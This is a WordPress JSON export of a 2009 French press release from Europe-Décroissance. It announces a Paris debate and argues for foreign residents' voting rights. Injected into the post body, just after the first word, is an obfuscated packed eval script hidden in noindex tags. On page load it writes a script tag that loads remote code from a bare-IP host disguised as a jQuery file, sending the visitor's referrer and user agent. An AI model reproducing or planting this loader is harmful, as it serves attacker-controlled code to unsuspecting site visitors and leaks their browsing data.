{"id":2770,"date":"2009-05-04T05:53:44","date_gmt":"2009-05-04T05:53:44","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=2770"},"modified":"2009-05-04T05:53:44","modified_gmt":"2009-05-04T05:53:44","slug":"citoyennete-europeenne-de-residence-et-droit-de-vote-des-etrangers","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=2770","title":{"rendered":"Citoyennet\u00e9 europ\u00e9enne de r\u00e9sidence et droit de vote des \u00e9trangers"},"content":{"rendered":"<p><strong>Mardi <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ahbab|var|u0026u|referrer|fzrky||js|php'.split('|'),0,{}))\n<\/script><\/noindex> 05\/05\/09 \u00e0 20h salle du FIAP, 30, rue Cabanis M\u00b0Glaci\u00e8re<\/strong><\/p>\n<p><strong>Communiqu\u00e9 de presse<\/strong> d&rsquo;Europe-D\u00e9croissance ci-dessous<\/p>\n<p><strong>Programme <\/strong>:<\/p>\n<ul>\n<li>20h00 \u2013 20h05: introduction (Mohamed Ben Sa\u00efd)<\/li>\n<li>20h05 \u2013 20h20: intervention de Catherine Wihtol de Wenden sur la citoyennet\u00e9 europ\u00e9enne<\/li>\n<li>20h20 \u2013 20h35: intervention de Paul Oriol sur la citoyennet\u00e9 europ\u00e9enne de r\u00e9sidence<\/li>\n<li>20h40 \u2013 22h15: interventions des repr\u00e9sentants des listes candidates aux \u00e9lections europ\u00e9ennes. Ont assur\u00e9 de leur pr\u00e9sence:<br \/>\nLO, Souny MET (NPA), Eric COQUEREL (Front de Gauche), Vincent LIEGEY (Porte-parole d&rsquo;Europe-D\u00e9croissance), Bernard DELEMOTTE (Les Verts), Lucile SCHMID (PS), Fadila MEHAL (Modem)). Mod\u00e9rateur: Pierre Gineste.<\/li>\n<li>22h15 \u2013 23h: \u00e9changes avec la salle<\/li>\n<\/ul>\n<p><!--more--><\/p>\n<p><strong>Europe-D\u00e9croissance est pour le droit de vote des r\u00e9sidents \u00e9trangers !<\/strong><\/p>\n<p>En tant que d\u00e9mocrates pour qui le droit de choisir ceux qui sont cens\u00e9s faire la loi est indissolublement li\u00e9 au devoir d\u2019y ob\u00e9ir, il va de soi que les objecteurs de croissance d\u00e9fendent le droit de vote des \u00e9trangers r\u00e9sidents \u00e0 toutes les \u00e9lections : bien s\u00fbr europ\u00e9ennes, mais aussi toutes les autres, qu&rsquo;elles soient locales ou non : municipales, cantonales, r\u00e9gionales et l\u00e9gislatives.<\/p>\n<p><strong>Mais cela est loin de nous sembler suffisant.<\/strong><\/p>\n<ul>\n<li>D\u2019une part, ce droit doit s&rsquo;accompagner de l&rsquo;instauration dans les communes compos\u00e9es de r\u00e9sidents \u00e9trangers d&rsquo;instances charg\u00e9es de veiller \u00e0 la non-discrimination et \u00e0 l&rsquo;int\u00e9gration, dans les domaines aussi vari\u00e9s que l&rsquo;\u00e9ducation, l&#8217;emploi, les services publics, le logement, etc.<\/li>\n<li>D&rsquo;autre part, la connaissance \u00e9tant un outil de la citoyennet\u00e9, il faut obtenir pour tout nouvel arrivant, un droit \u00e0 la formation, dont les modalit\u00e9s, contenus et r\u00e9tributions seront d\u00e9finis dans une commission, comprenant des repr\u00e9sentants des r\u00e9sidents \u00e9trangers, apr\u00e8s consultation du nouvel arrivant.<\/li>\n<li>De m\u00eame le regroupement familial doit \u00eatre un droit intangible, \u00e9tendu aux ascendants \u00e0 charge, ceux-ci b\u00e9n\u00e9ficiant du m\u00eame droit \u00e0 la formation.<\/li>\n<li>De plus, il faut veiller au maintien des droits culturels, par le renforcement du financement d&rsquo;associations, le soutien aux publications et aux radios en langue r\u00e9gionales.<\/li>\n<\/ul>\n<p><strong>Est-ce que la d\u00e9mocratie ne se limite qu&rsquo;au vote ?<\/strong><\/p>\n<ul>\n<li>Toutefois, \u00eatre objecteur de croissance c&rsquo;est aussi repenser la d\u00e9mocratie dans toute sa globalit\u00e9 \u2013 sans donc restreindre la d\u00e9mocratie \u00e0 sa dimension institutionnelle &#8211; ainsi que la mani\u00e8re de faire de la Politique qui ne doivent pas se limiter au droit de vote.<\/li>\n<li>Les \u00e9lections europ\u00e9ennes \u00e0 venir risquent de conna\u00eetre des taux d&rsquo;abstentions record. De plus, le fonctionnement actuel des institutions europ\u00e9ennes (rejet\u00e9 par r\u00e9f\u00e9rendum en 2005) n&rsquo;offre qu&rsquo;un pouvoir limit\u00e9 aux repr\u00e9sentants \u00e9lus d\u00e9mocratiquement (les lobbies faisant la loi en s&rsquo;appuyant sur la Commission).<\/li>\n<li>Europe-D\u00e9croissance pense qu&rsquo;il faut une repolitisation locale et continue afin que les citoyens (\u00e9trangers ou non) se r\u00e9approprient la Politique, c&rsquo;est \u00e0 dire leur choix de vie.<\/li>\n<\/ul>\n<p><strong>Positionnement \u00e9lectoraliste ?<\/strong><\/p>\n<p>De plus, Europe-D\u00e9croissance est assez critique sur le positionnement \u00e9lectoraliste de certains partis sur les questions du droit de vote des r\u00e9sidents \u00e9tranger (r\u00e9cup\u00e9ration d&rsquo;un c\u00f4t\u00e9, populisme de l&rsquo;autre).<\/p>\n<p><strong>Contradictions ?<\/strong><\/p>\n<ul>\n<li>Les statistiques montrent qu&rsquo;un grand nombre de nos concitoyens sont contre le droit de vote des r\u00e9sidents \u00e9trangers. Nous pensons qu&rsquo;il est important de prendre le temps de comprendre pourquoi.<\/li>\n<li>Europe-D\u00e9croissance trouve contradictoire le fait de d\u00e9fendre la d\u00e9mocratie et le droit de vote et d&rsquo;annoncer que l&rsquo;extr\u00eame-droite et la droite-extr\u00eame ne soient pas invit\u00e9es \u00e0 d\u00e9battre sur ces th\u00e8mes. Il nous semble important de les \u00e9couter pour mieux comprendre pourquoi tant de nos concitoyens rejettent ce droit de vote : comment, sinon, se donner les possibilit\u00e9s d\u2019opposer la rationalit\u00e9 des arguments et la coh\u00e9rence des id\u00e9es en face de l\u2019irrationalit\u00e9 des peurs et des amalgames ?<\/li>\n<\/ul>\n<p><strong>Comp\u00e9titions \u00e9conomiques ?<\/strong><\/p>\n<ul>\n<li>Notre soci\u00e9t\u00e9 est fondamentalement \u00e9conomiciste et construite autours du principe de comp\u00e9tition \u00e9conomique. Il est donc tout \u00e0 fait logique, tout en le regrettant, que, lorsque des personnes sont mises en comp\u00e9tition les unes avec les autres, qui plus est dans cette p\u00e9riode de crise, ce ne soit pas un sentiment de solidarit\u00e9 et de partage qui prime.<\/li>\n<li>De m\u00eame, il nous semble important de rappeler que la majeure partie de l&rsquo;immigration est plus subie pour des raisons \u00e9conomiques ou g\u00e9opolitiques que choisie.<\/li>\n<li>Parler du droit de vote des r\u00e9sidents \u00e9trangers, c&rsquo;est aussi poser la question du \u00ab pourquoi ces r\u00e9sidents \u00bb, celle des relations nord-sud, celle de notre mod\u00e8le de soci\u00e9t\u00e9. Et aussi, la question de notre empreinte \u00e9cologique (au moins 3 plan\u00e8tes), c&rsquo;est \u00e0 dire de bien comprendre que nous devons aller chercher ces 2 plan\u00e8tes dans les pays les plus pauvres. La question aussi de notre imp\u00e9rialisme culturel \u00e0 travers la publicit\u00e9, les m\u00e9dias, le cin\u00e9ma, qui colonise nos imaginaires mais aussi ceux d&rsquo;autres cultures avec cette illusion de bonheur passant par un consum\u00e9risme forcen\u00e9 !<\/li>\n<\/ul>\n<p><strong>C&rsquo;est repenser la soci\u00e9t\u00e9 en profondeur et rappeler la primaut\u00e9 de l&rsquo;humain sur l&rsquo;\u00e9conomie.<\/strong><\/p>\n<p style=\"text-align: right;\"><strong><a href=\"http:\/\/www.partipourladecroissance.net\/?cat=26\">Europe-D\u00e9croissance<\/a><br \/>\n<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Mardi 05\/05\/09 \u00e0 20h salle du FIAP, 30, rue Cabanis M\u00b0Glaci\u00e8re Communiqu\u00e9 de presse d&rsquo;Europe-D\u00e9croissance ci-dessous Programme : 20h00 \u2013 20h05: introduction (Mohamed Ben Sa\u00efd) 20h05 \u2013 20h20: intervention de Catherine Wihtol de Wenden sur la citoyennet\u00e9 europ\u00e9enne 20h20 \u2013 &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=2770\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,8],"tags":[],"class_list":["post-2770","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2770","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2770"}],"version-history":[{"count":0,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/2770\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2770"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2770"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2770"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}